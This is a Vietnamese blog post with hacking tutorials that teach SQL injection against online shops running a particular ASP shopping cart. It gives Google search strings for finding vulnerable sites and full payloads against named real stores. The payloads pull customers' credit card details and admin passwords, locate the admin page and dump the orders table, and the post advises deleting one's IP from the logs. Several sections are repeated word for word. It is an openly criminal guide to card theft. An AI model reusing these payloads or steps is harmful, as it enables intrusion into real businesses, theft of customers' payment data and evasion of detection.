link tool change series HDD : http://rilwis.info/softs/Volumeserial_src.rar
Thứ Sáu, 16 tháng 1, 2009
Hack CC co ban
thấy nhiều chú nhàn rỗi quá, toàn ngồi chờ post cc để ăn thôi
nên post bài này để cho các chú chỉ việc copy và paste
đầu tiên lên google.còm tìm mấy từ khóa sau<< cái này ko được lười đâu đấy
Quote:
shopexd.asp?id=xxx
shoptellafriend.asp?id=xxx
shopdisplayproducts.asp?id=xxx
mấy cái xxx thay = những con số nhé
vd ở đây kiếm được cái
Code:
http://www.jackelscollection.com/webstore/shopdisplayproducts.asp?id=17'wow đẹp quá thử thêm cái ' xem nào
Code:
http://www.jackelscollection.com/webstore/shopdisplayproducts.asp?id=17'ố là la cái j thế này
Quote:
Products
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ' and hide=0 and (p.productmatch=' or p.productmatch is null) order by pother1,specialoffer desc,cname'.
/webstore/shop$db.asp, line 465
ở đây để cho các chú lười khó hiểu tớ cho luôn cái câu query để lấy cc
Quote:
or 1=convert(int,(select top 1 convert(varchar,isnull(convert(varchar,orderid),'N ULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,odate), 'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ofirstn ame),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,olastna me),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,oaddres s),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocity), 'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ostate) ,'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ophone) ,'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,opostco de),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocountr y),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardna me),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardad dress),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardty pe),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardno ),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardex pires),'NULL'))%2b' /'%2bconvert(varchar,isnull(convert(varchar,oauthor ization),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,oemail) ,'NULL')) from orders where orderid not in ('1') order by orderid desc))--sp_password
//passadmin
áp dụng vào cái shop trên nào
Quote:
http://www.jackelscollection.com/webstore/shopdisplayproducts.asp?id=17%20%20or%201=convert( int,(select%20top%201%20convert(varchar,isnull(con vert(varchar,orderid),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,odate), 'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ofirstn ame),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,olastna me),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,oaddres s),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocity), 'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ostate) ,'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ophone) ,'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,opostco de),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocountr y),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardna me),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardad dress),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardty pe),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardno ),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardex pires),'NULL'))%2b'%20/'%2bconvert(varchar,isnull(convert(varchar,oauthor ization),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,oemail) ,'NULL'))%20from%20orders%20where%20orderid%20not% 20in%20%20('1')%20order%20by%20orderid%20desc))--sp_password
tiếp theo lấy pass của thằng admin cái chơi
câu lệnh
Quote:
and 1=convert(int,(select top 1 fldusername%2b' // '%2bfldPassword from tbluser))--sp_password
thử xem nào
Quote:
http://www.jackelscollection.com/webstore/shopdisplayproducts.asp?id=17and%201=convert(int,( select%20top%201%20fldusername%2b'%20//%20'%2bfldPassword%20from%20tbluser))--sp_password
vậy là được user name và password của thằng admin rồi. nhưng còn link login thì sao nhỉ? >>> đưa câu lệnh sau vào xem thế nào
Quote:
and 1=convert(int,(select top 1 fieldname%2b' // '%2bfieldvalue from configuration where fieldname not in ('affallowaffiliatesrevieworders','affcommissionin cludesallorders','affcommissionIncludesshipping',' affcommissionrate','affdirecturl','affinfourl','af fpaymenttypes','affsubject','afftemplateaffiliate' ,'afftemplateMerchant','affwebsite','xaddcatalogid ','xaddproductsubcategorybycategory','xaddproducts upplierdropdown','xadminmenucheck','xadminrestrict products')))--sp_password
he he cái gì đây
Quote:
http://www.jackelscollection.com/webstore/shopdisplayproducts.asp?id=17%20and%201=convert(in t,(select%20top%201%20fieldname%2b'%20//%20'%2bfieldvalue%20from%20configuration%20where%2 0fieldname%20not%20in%20('affallowaffiliatesreview orders','affcommissionincludesallorders','affcommi ssionIncludesshipping','affcommissionrate','affdir ecturl','affinfourl','affpaymenttypes','affsubject ','afftemplateaffiliate','afftemplateMerchant','af fwebsite','xaddcatalogid','xaddproductsubcategoryb ycategory','xaddproductsupplierdropdown','xadminme nucheck','xadminrestrictproducts')))--sp_password
vậy là có link login vào nhé vào rồi thì làm sao nhỉ? à nếu chỉ muốn kiếm cc thôi thì sau khi login vào trang admin vào Advanced Query
gõ hoặc copy
Quote:
select * from orders
hà hà đơn giản chỉ thế thôi đương nhiên là các bạn nên dùng thêm mệnh đề where để tìm những cc nào còn hạn sử dụng và thay * = những trường cụ thể để đỡ rối mắt, và cái shop admin này còn nhiều thứ để nghịch ngợm lắm
lưu ý: quay lại trang admin vào Log History xóa cái ip của mình đi đừng hỏi cái này
nên post bài này để cho các chú chỉ việc copy và paste
đầu tiên lên google.còm tìm mấy từ khóa sau<< cái này ko được lười đâu đấy
Quote:
shopexd.asp?id=xxx
shoptellafriend.asp?id=xxx
shopdisplayproducts.asp?id=xxx
mấy cái xxx thay = những con số nhé
vd ở đây kiếm được cái
Code:
http://www.jackelscollection.com/webstore/shopdisplayproducts.asp?id=17'wow đẹp quá thử thêm cái ' xem nào
Code:
http://www.jackelscollection.com/webstore/shopdisplayproducts.asp?id=17'ố là la cái j thế này
Quote:
Products
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ' and hide=0 and (p.productmatch=' or p.productmatch is null) order by pother1,specialoffer desc,cname'.
/webstore/shop$db.asp, line 465
ở đây để cho các chú lười khó hiểu tớ cho luôn cái câu query để lấy cc
Quote:
or 1=convert(int,(select top 1 convert(varchar,isnull(convert(varchar,orderid),'N ULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,odate), 'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ofirstn ame),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,olastna me),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,oaddres s),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocity), 'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ostate) ,'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ophone) ,'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,opostco de),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocountr y),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardna me),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardad dress),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardty pe),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardno ),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardex pires),'NULL'))%2b' /'%2bconvert(varchar,isnull(convert(varchar,oauthor ization),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,oemail) ,'NULL')) from orders where orderid not in ('1') order by orderid desc))--sp_password
//passadmin
áp dụng vào cái shop trên nào
Quote:
http://www.jackelscollection.com/webstore/shopdisplayproducts.asp?id=17%20%20or%201=convert( int,(select%20top%201%20convert(varchar,isnull(con vert(varchar,orderid),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,odate), 'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ofirstn ame),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,olastna me),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,oaddres s),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocity), 'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ostate) ,'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ophone) ,'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,opostco de),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocountr y),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardna me),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardad dress),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardty pe),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardno ),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardex pires),'NULL'))%2b'%20/'%2bconvert(varchar,isnull(convert(varchar,oauthor ization),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,oemail) ,'NULL'))%20from%20orders%20where%20orderid%20not% 20in%20%20('1')%20order%20by%20orderid%20desc))--sp_password
tiếp theo lấy pass của thằng admin cái chơi
câu lệnh
Quote:
and 1=convert(int,(select top 1 fldusername%2b' // '%2bfldPassword from tbluser))--sp_password
thử xem nào
Quote:
http://www.jackelscollection.com/webstore/shopdisplayproducts.asp?id=17and%201=convert(int,( select%20top%201%20fldusername%2b'%20//%20'%2bfldPassword%20from%20tbluser))--sp_password
vậy là được user name và password của thằng admin rồi. nhưng còn link login thì sao nhỉ? >>> đưa câu lệnh sau vào xem thế nào
Quote:
and 1=convert(int,(select top 1 fieldname%2b' // '%2bfieldvalue from configuration where fieldname not in ('affallowaffiliatesrevieworders','affcommissionin cludesallorders','affcommissionIncludesshipping',' affcommissionrate','affdirecturl','affinfourl','af fpaymenttypes','affsubject','afftemplateaffiliate' ,'afftemplateMerchant','affwebsite','xaddcatalogid ','xaddproductsubcategorybycategory','xaddproducts upplierdropdown','xadminmenucheck','xadminrestrict products')))--sp_password
he he cái gì đây
Quote:
http://www.jackelscollection.com/webstore/shopdisplayproducts.asp?id=17%20and%201=convert(in t,(select%20top%201%20fieldname%2b'%20//%20'%2bfieldvalue%20from%20configuration%20where%2 0fieldname%20not%20in%20('affallowaffiliatesreview orders','affcommissionincludesallorders','affcommi ssionIncludesshipping','affcommissionrate','affdir ecturl','affinfourl','affpaymenttypes','affsubject ','afftemplateaffiliate','afftemplateMerchant','af fwebsite','xaddcatalogid','xaddproductsubcategoryb ycategory','xaddproductsupplierdropdown','xadminme nucheck','xadminrestrictproducts')))--sp_password
vậy là có link login vào nhé vào rồi thì làm sao nhỉ? à nếu chỉ muốn kiếm cc thôi thì sau khi login vào trang admin vào Advanced Query
gõ hoặc copy
Quote:
select * from orders
hà hà đơn giản chỉ thế thôi đương nhiên là các bạn nên dùng thêm mệnh đề where để tìm những cc nào còn hạn sử dụng và thay * = những trường cụ thể để đỡ rối mắt, và cái shop admin này còn nhiều thứ để nghịch ngợm lắm
lưu ý: quay lại trang admin vào Log History xóa cái ip của mình đi đừng hỏi cái này
HƯỚNG DẪN HACK SHOP BẰNG SQL INJECTION
Tất cả những kiến thức này đều rất căn bản , Nhưng lại hết sức hữu dụng trong việc hack shop.Chỉ cần thành thạo những kiến thức này là bạn hack được cả đống shop rồi .
Để tìm site bị lỗi kiểu này đòi hỏi bạn phải có nhiều kinh nghiệm tìm lỗi và search shop như thế nào cho thật hiệu quả. Nên search shop ở http://www.google.com/ hoặc http://www.search.com/ Từ khoá nên dùng:allinurl:”shopdisplayproducts.asp?id="hoặc search theo domain allinurl:”.com/shopdisplayproducts.asp?id= "bạn có thể thay .com bằng .net,.biz ,.us.....vv thay id bằng cat
theo tôi khi search bạn nên thêm giá trị của id= ví dụ như :allinurl:”shopdisplayproducts.asp?id=9"
Mỗi lần thay giá trị như vậy sẽ cho ra thêm nhiều kết quả mới .Sau khi search xong bạn chọn lấy một site bất kỳ ta.thêm dấu nháy đơn ' .
http://www.victim.com/shopping/shopdisplay...asp?id=153'
Nếu ko báo lỗi, bạn hãy thử thay id bằng cat xem http://www.victim.com/shopping/shopdisplay...sp?cat=153'
Trích: Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''./shopping/shopdisplayproducts.asp, line 93
Oh có lỗi rồi. Bạn nhìn kỹ nhé -----> Unclosed quotation mark before the character string đối với lỗi này ta sẽ dùng and 1=convert , Còn nếu nó báo thế này
CODE
Microsoft JET Database Engine error '80040e14' Syntax error in query expression 'cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c.catdescription like '5'%' and hide=0 order by specialoffer desc,cname'. /shop$db.asp, line 467
Thì đây là lỗi jet Bạn hãy chuyển qua phần 2
Bây giờ ta tiếp tục :
Trích:
CODE
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''./shopping/shopdisplayproducts.asp, line 93
Bước I:
Lấy table : đây là câu lệnh cơ bản để lấy table:
and 1=convert(int,(select top 1 table_name from information_schema.tables))--sp_password
bạn xoá dấu ' rồi thêm dòng query này vào phía sau
ta được như thế này
http://www.victim.com/shopping/shopd...from%20informa tion_schema.tables))--sp_password
Chú ý : %20 là mã ascii của dấu cách (space) , do IE ko chấp nhận dấu cách nên nó phải chuyển sang ascii
Trích:
CODE
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'ver_Faq' to a column of data type int./shopping/shopdisplayproducts.asp, line 93
kết quả 'ver_Faq' là tên của table đầu tiên trong cơ sở dữ liệu :câu lệnh lấy table tiếp theo :and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('ver_Faq')))--sp_password
ta được thế nàyhttp://www.victim.com/shopping/shopd...from%20informa tion_schema.tables%20where%20table_name%20not%20in %20('ver_Faq')))--sp_password
Trích:
CODE
ProductsMicrosoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'coupons' to a column of data type int./shopping/shopdisplayproducts.asp, line 93
Ta cứ lấy tiếp như vậy :
http://www.victim.com/shopping/shopd...%201=convert(i nt,(select%20top%201%20table_name%20from%20informa tion_schema.tables%20where%20table_name%20not%20in %20('ver_Faq','coupons')))--sp_password
Bước II : lấy column mục đích của chúng ta là tìm thông tin liên quan đến admin , thông thường nó nằm trong các table : users, tbluser,AdminUsers..........Giả sử ở đây là tbluser
Câu truy vấn dùng để lấy column:and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('tbluser')))--sp_password
ta được thế nàyhttp://www.victim.com/shopping/shopd...cts.asp?id=153 and 1=convert(int,(select top 1 column_ name from information_schema.columns where table_name=('tbluser')))--sp_password
Trích:
CODE
ProductsMicrosoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'fldauto' to a column of data type int./shopping/shopdisplayproducts.asp, line 93
Lấy column tiếp theo:and 1=convert(int,(select top 1 column_ name from information_schema.columns where table_name=('tbluser') and column_name not in ('fldauto')))--sp_password
Khi thêm code xong sẽ như thế này:
http://www.victim.com/shopping/shopdisplay...d%201=convert(i nt,(select%20top%201%20column_name%20from%20inform ation_schema.columns%20where%20table_name=('tbluse r')%20and%20column_name%20not%20in%20('fldauto'))) --sp_password
Trích: Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'fldusername' to a column of data type int./shopping/shopdisplayproducts.asp, line 93
Lấy column tiếp theo :and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('tbluser') and column_name not in ('fldauto','fldusername')))--sp_password
http://www.victim.com/shopping/shopdisplay...d%201=convert(i nt,(select%20top%201%20column_name%20from%20inform ation_schema.columns%20where%20table_name=('tbluse r')%20and%20column_name%20not%20in%20('fldauto','f ldusername')))--sp_password
Trích
CODE
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'fldpassword' to a column of data type int.
/shopping/shopdisplayproducts.asp, line 93
Ok được rồi, giờ ta lấy username và password :
++++Câu truy vấn :
_Lấy username
and 1=convert(int,(select top 1 fldusername from tbluser))--sp_password
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin' to a column of data type int. /shopping/shopdisplayproducts.asp, line 93----------> username là admin
_Lấy password :
and 1=convert(int,(select top 1 fldpassword from tbluser))--sp_password
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '1234' to a column of data type int. /shopping/shopdisplayproducts.asp, line 93----------> pass là 1234
Hoặc có thể lấy cả 2 cùng 1 lúc
and 1=convert(int,(select top 1 fldusername%2b'/'%2bfldpassword from tbluser))--sp_password
%2b là mã ascii của dấu +
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin/1234' to a column of data type int. /shopping/shopdisplayproducts.asp, line 93
Chú ý :Nhiều khi bạn không thể tìm thấy table tbluser hoặc users hay các table (có vẻ) liên quan đến thông tin admin .Lúc này chẳng nhẽ bạn đành lấy lần lượt các column trong từng table sao ? Chúng ta có 1 cách khác nhanh hơn đó là dùng từ khoá like
Giả sử ta cần tìm column 'fldpassword' mà không biết nó ở đâu .Ta thử search tại Table đầu tiên 'ver_Faq'
Câu truy vấn như sau:
and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('ver_Faq') and column_name like ('%25pass%25')))--sp_password
Bạn chú ý : câu truy vấn này sẽ trả về tên của column đầu tiên mà tên của nó có chứa chữ "pass"
Trích :
No products match your search
Oh vậy là table 'ver_Faq' ko có column nào mà tên của nó có chứa chữ "pass" .Đến đây chắc bạn biết làm gì tiếp, ta cứ search các table khác, table nào có nó sẽ cho ra kết quả như sau :
TríchMicrosoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'fldpassword' to a column of data type int.
/shopping/shopdisplayproducts.asp, line 93
Bước III:
Sau khi đã có username và password việc còn lại là tìm link admin .Ví dụ link của shop là thế này
http://www.victim.com/shopping/shopd...cts.asp?id=153
Thì link admin có thể nằm ở
http://www.victim.com/shopping/shopadmin.asp Hoặc http://www.victim.com/shopping/shopadmin1.asp
Nếu không được bạn hãy làm theo cách của tôi :
Ta biết column fieldvalue và fieldname chứa link admin
Column fieldvalue và fieldname thường nằm trong table configuration
Nhưng nhiều khi bạn đã lấy được tất cả table của shop nhưng vẫn không thấy table configuration , đó là vì table này đã bị rename , lúc này buộc bạn phải sử dụng tiếp từ khoá like để search column filedvalue . Cái này tôi không nói thêm nữa bạn. cứ áp dụng theo hướng dẫn ở trên.
Để lấy link admin bạn dùng câu truy vấn như sau :
and 1=convert(int,(select top 1 fieldname%2b'/'%2bfieldvalue from configuration where fieldname='xadminpage'))--sp_password
Trích:Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'xadminpage/5h0padm1n.asp' to a column of data type int.
/shopping/shopdisplayproducts.asp, line 93
ok link admin là 5h0padm1n.asp
Giờ thì bạn đã có shop rồi, giờ chỉ cần vào view cc nữa thôi ()
Để tìm site bị lỗi kiểu này đòi hỏi bạn phải có nhiều kinh nghiệm tìm lỗi và search shop như thế nào cho thật hiệu quả. Nên search shop ở http://www.google.com/ hoặc http://www.search.com/ Từ khoá nên dùng:allinurl:”shopdisplayproducts.asp?id="hoặc search theo domain allinurl:”.com/shopdisplayproducts.asp?id= "bạn có thể thay .com bằng .net,.biz ,.us.....vv thay id bằng cat
theo tôi khi search bạn nên thêm giá trị của id= ví dụ như :allinurl:”shopdisplayproducts.asp?id=9"
Mỗi lần thay giá trị như vậy sẽ cho ra thêm nhiều kết quả mới .Sau khi search xong bạn chọn lấy một site bất kỳ ta.thêm dấu nháy đơn ' .
http://www.victim.com/shopping/shopdisplay...asp?id=153'
Nếu ko báo lỗi, bạn hãy thử thay id bằng cat xem http://www.victim.com/shopping/shopdisplay...sp?cat=153'
Trích: Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''./shopping/shopdisplayproducts.asp, line 93
Oh có lỗi rồi. Bạn nhìn kỹ nhé -----> Unclosed quotation mark before the character string đối với lỗi này ta sẽ dùng and 1=convert , Còn nếu nó báo thế này
CODE
Microsoft JET Database Engine error '80040e14' Syntax error in query expression 'cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c.catdescription like '5'%' and hide=0 order by specialoffer desc,cname'. /shop$db.asp, line 467
Thì đây là lỗi jet Bạn hãy chuyển qua phần 2
Bây giờ ta tiếp tục :
Trích:
CODE
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''./shopping/shopdisplayproducts.asp, line 93
Bước I:
Lấy table : đây là câu lệnh cơ bản để lấy table:
and 1=convert(int,(select top 1 table_name from information_schema.tables))--sp_password
bạn xoá dấu ' rồi thêm dòng query này vào phía sau
ta được như thế này
http://www.victim.com/shopping/shopd...from%20informa tion_schema.tables))--sp_password
Chú ý : %20 là mã ascii của dấu cách (space) , do IE ko chấp nhận dấu cách nên nó phải chuyển sang ascii
Trích:
CODE
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'ver_Faq' to a column of data type int./shopping/shopdisplayproducts.asp, line 93
kết quả 'ver_Faq' là tên của table đầu tiên trong cơ sở dữ liệu :câu lệnh lấy table tiếp theo :and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('ver_Faq')))--sp_password
ta được thế nàyhttp://www.victim.com/shopping/shopd...from%20informa tion_schema.tables%20where%20table_name%20not%20in %20('ver_Faq')))--sp_password
Trích:
CODE
ProductsMicrosoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'coupons' to a column of data type int./shopping/shopdisplayproducts.asp, line 93
Ta cứ lấy tiếp như vậy :
http://www.victim.com/shopping/shopd...%201=convert(i nt,(select%20top%201%20table_name%20from%20informa tion_schema.tables%20where%20table_name%20not%20in %20('ver_Faq','coupons')))--sp_password
Bước II : lấy column mục đích của chúng ta là tìm thông tin liên quan đến admin , thông thường nó nằm trong các table : users, tbluser,AdminUsers..........Giả sử ở đây là tbluser
Câu truy vấn dùng để lấy column:and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('tbluser')))--sp_password
ta được thế nàyhttp://www.victim.com/shopping/shopd...cts.asp?id=153 and 1=convert(int,(select top 1 column_ name from information_schema.columns where table_name=('tbluser')))--sp_password
Trích:
CODE
ProductsMicrosoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'fldauto' to a column of data type int./shopping/shopdisplayproducts.asp, line 93
Lấy column tiếp theo:and 1=convert(int,(select top 1 column_ name from information_schema.columns where table_name=('tbluser') and column_name not in ('fldauto')))--sp_password
Khi thêm code xong sẽ như thế này:
http://www.victim.com/shopping/shopdisplay...d%201=convert(i nt,(select%20top%201%20column_name%20from%20inform ation_schema.columns%20where%20table_name=('tbluse r')%20and%20column_name%20not%20in%20('fldauto'))) --sp_password
Trích: Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'fldusername' to a column of data type int./shopping/shopdisplayproducts.asp, line 93
Lấy column tiếp theo :and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('tbluser') and column_name not in ('fldauto','fldusername')))--sp_password
http://www.victim.com/shopping/shopdisplay...d%201=convert(i nt,(select%20top%201%20column_name%20from%20inform ation_schema.columns%20where%20table_name=('tbluse r')%20and%20column_name%20not%20in%20('fldauto','f ldusername')))--sp_password
Trích
CODE
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'fldpassword' to a column of data type int.
/shopping/shopdisplayproducts.asp, line 93
Ok được rồi, giờ ta lấy username và password :
++++Câu truy vấn :
_Lấy username
and 1=convert(int,(select top 1 fldusername from tbluser))--sp_password
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin' to a column of data type int. /shopping/shopdisplayproducts.asp, line 93----------> username là admin
_Lấy password :
and 1=convert(int,(select top 1 fldpassword from tbluser))--sp_password
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '1234' to a column of data type int. /shopping/shopdisplayproducts.asp, line 93----------> pass là 1234
Hoặc có thể lấy cả 2 cùng 1 lúc
and 1=convert(int,(select top 1 fldusername%2b'/'%2bfldpassword from tbluser))--sp_password
%2b là mã ascii của dấu +
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin/1234' to a column of data type int. /shopping/shopdisplayproducts.asp, line 93
Chú ý :Nhiều khi bạn không thể tìm thấy table tbluser hoặc users hay các table (có vẻ) liên quan đến thông tin admin .Lúc này chẳng nhẽ bạn đành lấy lần lượt các column trong từng table sao ? Chúng ta có 1 cách khác nhanh hơn đó là dùng từ khoá like
Giả sử ta cần tìm column 'fldpassword' mà không biết nó ở đâu .Ta thử search tại Table đầu tiên 'ver_Faq'
Câu truy vấn như sau:
and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('ver_Faq') and column_name like ('%25pass%25')))--sp_password
Bạn chú ý : câu truy vấn này sẽ trả về tên của column đầu tiên mà tên của nó có chứa chữ "pass"
Trích :
No products match your search
Oh vậy là table 'ver_Faq' ko có column nào mà tên của nó có chứa chữ "pass" .Đến đây chắc bạn biết làm gì tiếp, ta cứ search các table khác, table nào có nó sẽ cho ra kết quả như sau :
TríchMicrosoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'fldpassword' to a column of data type int.
/shopping/shopdisplayproducts.asp, line 93
Bước III:
Sau khi đã có username và password việc còn lại là tìm link admin .Ví dụ link của shop là thế này
http://www.victim.com/shopping/shopd...cts.asp?id=153
Thì link admin có thể nằm ở
http://www.victim.com/shopping/shopadmin.asp Hoặc http://www.victim.com/shopping/shopadmin1.asp
Nếu không được bạn hãy làm theo cách của tôi :
Ta biết column fieldvalue và fieldname chứa link admin
Column fieldvalue và fieldname thường nằm trong table configuration
Nhưng nhiều khi bạn đã lấy được tất cả table của shop nhưng vẫn không thấy table configuration , đó là vì table này đã bị rename , lúc này buộc bạn phải sử dụng tiếp từ khoá like để search column filedvalue . Cái này tôi không nói thêm nữa bạn. cứ áp dụng theo hướng dẫn ở trên.
Để lấy link admin bạn dùng câu truy vấn như sau :
and 1=convert(int,(select top 1 fieldname%2b'/'%2bfieldvalue from configuration where fieldname='xadminpage'))--sp_password
Trích:Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'xadminpage/5h0padm1n.asp' to a column of data type int.
/shopping/shopdisplayproducts.asp, line 93
ok link admin là 5h0padm1n.asp
Giờ thì bạn đã có shop rồi, giờ chỉ cần vào view cc nữa thôi ()
Hack các shop jetdatabase
Đây là một ví dụ , bạn có thể thực hành ngay tại shop này
http://www.treasureshidden.com/shopp...ucts.asp?cat=9
bạn thêm vào sau 1 dấu nháy đơn '
http://www.treasureshidden.com/shopping/sh....asp?cat=9'
ok báo lỗi rồi
9' Microsoft JET Database Engine error '80040e14' Syntax error in query expression 'cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c.catdescription like '9%' and hide=0 order by specialoffer desc,cname'. /shop$db.asp, line 912
Bạn chú ý chỗ này nhé -----------> Syntax error in query expression 'cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c.catdescription like '9%' and hide=0 order by specialoffer desc,cname'
Khi nó báo như vậy thì ta sẽ dùng union ( bạn giữ nguyên dấu ' nhé )
Câu lệnh như sau :
union select 1 from tbluser"having 1=1--sp_password
